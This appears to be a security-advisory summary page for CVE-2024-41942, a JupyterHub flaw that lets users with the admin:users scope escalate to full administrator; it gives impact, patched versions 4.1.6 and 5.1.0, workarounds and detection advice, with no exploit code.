CVE-2024-41942
📋 TL;DR
In JupyterHub versions before 4.1.6 and 5.1.0, users granted the admin:users scope can escalate their privileges to become full administrators with unrestricted permissions. This affects JupyterHub deployments where admin:users scope is assigned to users who shouldn't have full administrative access. The impact is limited because admin:users is already a highly privileged scope typically given only to trusted users.
💻 Affected Systems
- JupyterHub
📦 What is this software?
Jupyterhub by Jupyter
Jupyterhub by Jupyter
Jupyterhub by Jupyter
Jupyterhub by Jupyter
⚠️ Risk & Real-World Impact
Worst Case
A user with admin:users scope gains full administrative control over the JupyterHub instance, allowing them to modify any user account, access all notebooks, and potentially compromise the entire multi-user environment.
Likely Case
Limited impact since admin:users scope is rarely granted to untrusted users. Most deployments already treat this scope as equivalent to full admin access.
If Mitigated
No impact if admin:users scope is only granted to fully trusted administrators as intended, or if the system is patched.
🎯 Exploit Status
Exploitation requires authenticated access with admin:users scope. The vulnerability is straightforward to exploit once the prerequisite scope is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.1.6 or 5.1.0
Vendor Advisory: https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-9x4q-3gxw-849f
Restart Required: Yes
Instructions:
1. Upgrade JupyterHub to version 4.1.6 (for 4.x branch) or 5.1.0 (for 5.x branch). 2. Restart the JupyterHub service. 3. Verify the upgrade was successful.
🔧 Temporary Workarounds
Remove admin:users scope from non-admin users
allRevoke the admin:users scope from any users who should not have full administrative privileges.
# Review and modify JupyterHub configuration to remove admin:users scope from non-admin users
# Check configuration files for scope assignments
🧯 If You Can't Patch
- Review all user accounts and ensure admin:users scope is only granted to fully trusted administrators.
- Implement additional monitoring for privilege escalation attempts and administrative actions.
🔍 How to Verify
Check if Vulnerable:
Check JupyterHub version and verify if admin:users scope is assigned to any users.Check Version:
jupyterhub --versionVerify Fix Applied:
Confirm JupyterHub version is 4.1.6 or higher (for 4.x) or 5.1.0 or higher (for 5.x). Test that users with admin:users scope cannot grant themselves full admin privileges.📡 Detection & Monitoring
Log Indicators:
- Log entries showing users with admin:users scope modifying their own privileges
- Unexpected administrative actions from users not previously designated as full admins
Network Indicators:
- API calls to modify user privileges or admin status
SIEM Query:
Search for JupyterHub logs containing 'admin:users' scope modifications or privilege escalation attempts.